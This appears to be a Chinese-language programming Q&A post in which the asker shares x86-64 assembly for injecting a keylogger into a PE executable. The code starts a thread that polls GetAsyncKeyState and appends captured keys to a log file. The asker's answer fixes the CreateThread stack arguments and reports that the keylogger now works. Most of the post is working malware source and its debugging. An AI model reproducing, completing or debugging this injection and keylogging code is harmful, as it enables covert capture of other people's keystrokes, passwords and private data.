为什么CreateThread不工作?

时间:2017-03-19 09:54:29

标签: x86-64 createthread

我试图把这段代码注入PE文件，用CreateThread在该PE文件中运行我的键盘记录器程序，但CreateThread失败并返回错误3E6h（ERROR_NOACCESS）。下面的源代码中错误出在哪里？

procedure:
sub rsp, 28h            
and rsp, 0fffffffffffffff0h     
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress                

lea rcx, [user32dll]
call rax                


lea rdx, [createthread7]
lea rcx, [kernel32dll]
call MyGetProcAddress         
lea rbx,[pThread]                                                                                                    ;     

lea rbx,[ThreadId]
mov qword[rsp+20h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax


add rsp, 28h            
db 0                    ;JMP PARA OEP
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0


proc KL
REPS:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress                

lea rcx, [user32dll]
call rax                

lea rdx, [getasync]
lea rcx, [user32dll]
call MyGetProcAddress         
MOV [GETKEYS],RAX

Label001:
mov [VIRTUAL_KEY_CODE],8
L0:
cmp [VIRTUAL_KEY_CODE],255
ja La1
mov rcx,[VIRTUAL_KEY_CODE]
MOV RAX,[GETKEYS]
call rax
cmp eax,-32767
MOV RAX,[GETKEYS]
jz Label1
inc [VIRTUAL_KEY_CODE]
jmp L0
La1:
mov [VIRTUAL_KEY_CODE],8
jmp Label001
Label1:

lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress         


lea rcx, [msvcrtdll]
call rax                


lea rdx, [fopen7]
lea rcx,[msvcrtdll]
call MyGetProcAddress                     

lea r8, [filemode]
lea rdx, [file_name]
lea rcx,[fp]
call rax                ;TO LOG KEYSTROKES

lea rdx, [fwrite7]
lea rcx,[msvcrtdll]
call MyGetProcAddress         


mov r9,[fp]
mov r8,1
mov rdx,1
lea rcx, [VIRTUAL_KEY_CODE]
call rax                ;TO LOG KEYSTROKES

lea rdx, [fclose7]
lea rcx,[msvcrtdll]
call MyGetProcAddress         

mov rcx,[fp]
call rax

jmp REPS
endp

proc MyGetProcAddress
...
ret
endp
kernel32dll            db  'KERNEL32.DLL', 0
loadlibrary7            db  'loadlibraryA', 0
user32dll              db  'USER32.DLL', 0
createthread7       db  'CreateThread', 0
msvcrtdll              db  'MSVCRT.DLL', 0
getasync                db  'GetAsyncKeyState', 0
fopen7              db  'fopen_s', 0
fwrite7             db  'fwrite',0
fclose7             db  'fclose',0
exitproc7           db  'ExitProcess', 0
filemode                db   'a',0
file_name               db   'log',0
pThread                 dq   0
struct SECURITY_ATTRIBUTES
A dd 0
B dq 0
C dd 0
ends
SECURITY_ATTRIBUTES_ SECURITY_ATTRIBUTES
GEYKEYS                 dq   0
VIRTUAL_KEY_CODE        dq   0
fp                      dq   0
Par                     dq   0
... 

1 个答案:

答案 0 :(得分:0)

我已将我的源代码修改如下:

mov qword[rsp+20h], 0
lea rbx,[ThreadId]
mov qword[rsp+28h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax

现在我的键盘记录器工作正常。谢谢你的帮助。